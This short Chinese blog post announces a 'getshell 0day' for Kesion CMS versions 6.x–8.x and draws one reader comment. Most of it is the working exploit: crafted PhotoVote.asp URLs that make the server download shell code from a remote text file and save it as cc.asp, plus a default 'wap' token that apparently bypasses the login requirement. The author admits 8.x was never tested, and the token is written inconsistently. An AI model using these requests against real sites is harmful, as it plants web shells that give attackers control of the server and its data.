科讯 6.x~8.x getshell 0day

利用比较简单,登陆后访问 http://xxx.com/Plus/PhotoVote.asp?LocalFileName=cc.asp&RemoteFileUrl=http://xxx.com/157501.txt 成功会在Wap/Plus下写入cc.asp,并返回文件名,其中的157501.txt为shell代码。。 ps:禁止转载,6.x~7.x测试存在,8.x是我加上去的,没有测试,应该存在吧 有的朋友说鸡肋,那就不鸡肋吧: http://xxx.com/Wap/Plus/PhotoVote.asp?LocalFileName=cc.asp&RemoteFileUrl=http://xxx.com/1.txt&wap=76650e3cd0279d4d5fa6c99ad5590 其中的wap=76650e3cd0279d4d5fa6c99ad5590a30是登陆后的验证码,相当于session 这个东西wap=76650e3cd0279d4d5fa6c99ad5590是默认的。。。。好了不多说了。

1 条评论

  1. tbhu

    还是不知道怎么利用

发表评论